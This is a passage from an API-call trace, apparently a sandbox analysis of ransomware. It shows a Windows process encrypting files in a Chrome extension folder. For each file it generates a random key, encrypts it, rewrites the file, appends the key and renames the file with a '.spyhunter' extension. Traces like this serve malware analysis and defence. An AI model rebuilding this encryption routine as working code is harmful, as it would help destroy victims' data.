halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\manifest.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\manifest.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\manifest.json.spyhunter")) returned 1 [0137.532] GetProcessHeap () returned 0x2c0000 [0137.532] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0137.532] GetProcessHeap () returned 0x2c0000 [0137.532] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0137.532] GetProcessHeap () returned 0x2c0000 [0137.532] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d0fe78 | out: hHeap=0x2c0000) returned 1 [0137.533] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f568 | out: pbBuffer=0x248f568) returned 1 [0137.533] GetProcessHeap () returned 0x2c0000 [0137.533] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0137.534] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f560*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f560*=0x30) returned 1 [0137.534] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0137.535] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el\\messages.json") returned 159 [0137.535] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0137.535] GetProcessHeap () returned 0x2c0000 [0137.535] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0137.535] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f524, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248f524*=0x36b, lpOverlapped=0x0) returned 1 [0137.566] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffc95, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0137.566] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x36b, lpNumberOfBytesWritten=0x248f524, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248f524*=0x36b, lpOverlapped=0x0) returned 1 [0137.566] GetProcessHeap () returned 0x2c0000 [0137.566] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0137.566] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0137.566] WriteFile (in: hFile=0x178, lpBuffer=0x248f564*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f524, lpOverlapped=0x0 | out: lpBuffer=0x248f564*, lpNumberOfBytesWritten=0x248f524*=0x4, lpOverlapped=0x0) returned 1 [0137.567] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f524, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248f524*=0x30, lpOverlapped=0x0) returned 1 [0137.567] CloseHandle (hObject=0x178) returned 1 [0137.567] GetProcessHeap () returned 0x2c0000 [0137.567] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0137.567] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el\\messages.json.spyhunter") returned 169 [0137.567] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el\\messages.json.spyhunter")) returned 1 [0137.568] GetProcessHeap () returned 0x2c0000 [0137.568] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0137.568] GetProcessHeap () returned 0x2c0000 [0137.568] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0137.568] GetProcessHeap () returned 0x2c0000 [0137.568] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f80680 | out: hHeap=0x2c0000) returned 1 [0137.570] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f560 | out: pbBuffer=0x248f560) returned 1 [0137.570] GetProcessHeap () returned 0x2c0000 [0137.570] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0137.570] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f558*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f558*=0x30) returned 1 [0137.570] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\cs\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0137.571] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\cs\\messages.json") returned 159 [0137.571] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0137.571] GetProcessHeap () returned 0x2c0000 [0137.571] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0137.571] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f51c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248f51c*=0x297, lpOverlapped=0x0) returned 1 [0137.584] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffd69, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0137.584] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x297, lpNumberOfBytesWritten=0x248f51c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248f51c*=0x297, lpOverlapped=0x0) returned 1 [0137.584] GetProcessHeap () returned 0x2c0000 [0137.584] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0137.584] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0137.584] WriteFile (in: hFile=0x178, lpBuffer=0x248f55c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f51c, lpOverlapped=0x0 | out: lpBuffer=0x248f55c*, lpNumberOfBytesWritten=0x248f51c*=0x4, lpOverlapped=0x0) returned 1 [0137.584] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f51c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248f51c*=0x30, lpOverlapped=0x0) returned 1 [0137.585] CloseHandle (hObject=0x178) returned 1 [0137.585] GetProcessHeap () returned 0x2c0000 [0137.585] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0137.585] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\cs\\messages.json.spyhunter") returned 169 [0137.585] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\cs\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\cs\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\cs\\messages.json.spyhunter")) returned 1 [0137.586] GetProcessHeap () returned 0x2c0000 [0137.586] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0137.586] GetProcessHeap () returned 0x2c0000 [0137.586] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0137.586] GetProcessHeap () returned 0x2c0000 [0137.586] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f801e8 | out: hHeap=0x2c0000) returned 1 [0137.589] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f558 | out: pbBuffer=0x248f558) returned 1 [0137.589] GetProcessHeap () returned 0x2c0000 [0137.589] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0137.590] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f550*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f550*=0x30) returned 1 [0137.590] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\bg\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0137.590] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\bg\\messages.json") returned 159 [0137.591] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0137.591] GetProcessHeap () returned 0x2c0000 [0137.591] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0137.591] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f514, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248f514*=0x376, lpOverlapped=0x0) returned 1 [0137.592] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffc8a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0137.592] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x376, lpNumberOfBytesWritten=0x248f514, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248f514*=0x376, lpOverlapped=0x0) returned 1 [0137.592] GetProcessHeap () returned 0x2c0000 [0137.592] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0137.593] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0137.593] WriteFile (in: hFile=0x178, lpBuffer=0x248f554*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f514, lpOverlapped=0x0 | out: lpBuffer=0x248f554*, lpNumberOfBytesWritten=0x248f514*=0x4, lpOverlapped=0x0) returned 1 [0137.593] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f514, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248f514*=0x30, lpOverlapped=0x0) returned 1 [0137.593] CloseHandle (hObject=0x178) returned 1 [0137.593] GetProcessHeap () returned 0x2c0000 [0137.593] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0137.593] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\bg\\messages.json.spyhunter") returned 169 [0137.593] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\bg\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\bg\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\bg\\messages.json.spyhunter")) returned 1 [0137.594] GetProcessHeap () returned 0x2c0000 [0137.594] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0137.594] GetProcessHeap () returned 0x2c0000 [0137.594] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0137.594] GetProcessHeap () returned 0x2c0000 [0137.594] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f7fa40 | out: hHeap=0x2c0000) returned 1 [0137.596] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f550 | out: pbBuffer=0x248f550) returned 1 [0137.596] GetProcessHeap () returned 0x2c0000 [0137.597] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0137.597] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f548*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f548*=0x30) returned 1 [0137.597] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_pressed.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_pressed.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0137.598] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_pressed.png") returned 175 [0137.598] StrStrW (lpFirst="topbar_floating_button_pressed.png", lpSrch=".txt") returned 0x0 [0137.598] GetProcessHeap () returned 0x2c0000 [0137.598] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0137.598] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f50c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248f50c*=0xa0, lpOverlapped=0x0) returned 1 [0137.599] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffff60, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0137.599] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xa0, lpNumberOfBytesWritten=0x248f50c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248f50c*=0xa0, lpOverlapped=0x0) returned 1 [0137.599] GetProcessHeap () returned 0x2c0000 [0137.599] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0137.599] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0137.600] WriteFile (in: hFile=0x178, lpBuffer=0x248f54c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f50c, lpOverlapped=0x0 | out: lpBuffer=0x248f54c*, lpNumberOfBytesWritten=0x248f50c*=0x4, lpOverlapped=0x0) returned 1 [0137.600] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f50c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248f50c*=0x30, lpOverlapped=0x0) returned 1 [0137.600] CloseHandle (hObject=0x178) returned 1 [0137.600] GetProcessHeap () returned 0x2c0000 [0137.600] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0137.600] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_pressed.png.spyhunter") returned 185 [0137.600] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_pressed.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_pressed.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_pressed.png.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_pressed.png.spyhunter")) returned 1 [0137.601] GetProcessHeap () returned 0x2c0000 [0137.601] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0137.601] GetProcessHeap () returned 0x2c0000 [0137.601] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0137.601] GetProcessHeap () returned 0x2c0000 [0137.601] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d0fcd0 | out: hHeap=0x2c0000) returned 1 [0137.601] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f548 | out: pbBuffer=0x248f548) returned 1 [0137.602] GetProcessHeap () returned 0x2c0000 [0137.602] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0137.602] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f540*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f540*=0x30) returned 1 [0137.602] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_maximize.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_maximize.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0137.602] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_maximize.png") returned 176 [0137.602] StrStrW (lpFirst="topbar_floating_button_maximize.png", lpSrch=".txt") returned 0x0 [0137.602] GetProcessHeap () returned 0x2c0000 [0137.602] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0137.603] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f504, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248f504*=0xa6, lpOverlapped=0x0) returned 1 [0137.603] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffff5a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0137.604] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xa6, lpNumberOfBytesWritten=0x248f504, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248f504*=0xa6, lpOverlapped=0x0) returned 1 [0137.604] GetProcessHeap () returned 0x2c0000 [0137.604] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0137.604] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0137.604] WriteFile (in: hFile=0x178, lpBuffer=0x248f544*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f504, lpOverlapped=0x0 | out: lpBuffer=0x248f544*, lpNumberOfBytesWritten=0x248f504*=0x4, lpOverlapped=0x0) returned 1 [0137.604] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f504, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248f504*=0x30, lpOverlapped=0x0) returned 1 [0137.604] CloseHandle (hObject=0x178) returned 1 [0137.604] GetProcessHeap () returned 0x2c0000 [0137.604] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0137.605] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_maximize.png.spyhunter") returned 186 [0137.605] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_maximize.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_maximize.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_maximize.png.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_maximize.png.spyhunter")) returned 1 [0137.605] GetProcessHeap () returned 0x2c0000 [0137.605] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0137.606] GetProcessHeap () returned 0x2c0000 [0137.606] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0137.606] GetProcessHeap () returned 0x2c0000 [0137.606] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d0fb20 | out: hHeap=0x2c0000) returned 1 [0137.606] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f548 | out: pbBuffer=0x248f548) returned 1 